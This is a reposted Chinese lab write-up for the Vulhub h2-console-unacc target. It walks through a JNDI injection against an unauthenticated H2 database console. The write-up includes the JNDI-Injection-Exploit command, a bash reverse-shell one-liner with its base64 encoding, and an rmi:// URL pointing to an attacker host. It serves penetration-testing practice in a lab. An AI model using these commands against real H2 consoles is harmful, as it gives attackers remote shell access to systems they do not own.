欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 新闻 > 资讯 > Vulhub靶机 h2-console-unacc jndi注入(渗透测试详解)

Vulhub靶机 h2-console-unacc jndi注入(渗透测试详解)

2025/2/18 15:35:11 来源:https://blog.csdn.net/2301_78721909/article/details/145621290  浏览:    关键词:Vulhub靶机 h2-console-unacc jndi注入(渗透测试详解)

一、开启vulhub环境

docker-compose up -d  启动
docker ps 查看开放的端口

二、访问靶机IP 8080端口 

1、拼接h2-console,得到h2database web管理页面

2、利用以下工具,启动反弹命令并开启nc监听

工具地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,反弹shell语句(base64加密)}|{base64,-d}|{bash,-i}" -A 攻击机IP/bin/sh -i >& /dev/tcp/x.x.x.x/6666 0>&1
L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjEuMTMzLjU3LzY2NjYgMD4mMQ==

三、指定驱动类及将生成的指令进行提交反弹shell

指定驱动器类:javax.naming.InitialContext
调用远程rmi方法:rmi://47.121.133.57:1099/en4taw

点击连接,成功反弹上shell

至此,系统权限成功获取

下期再见,家人们!

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词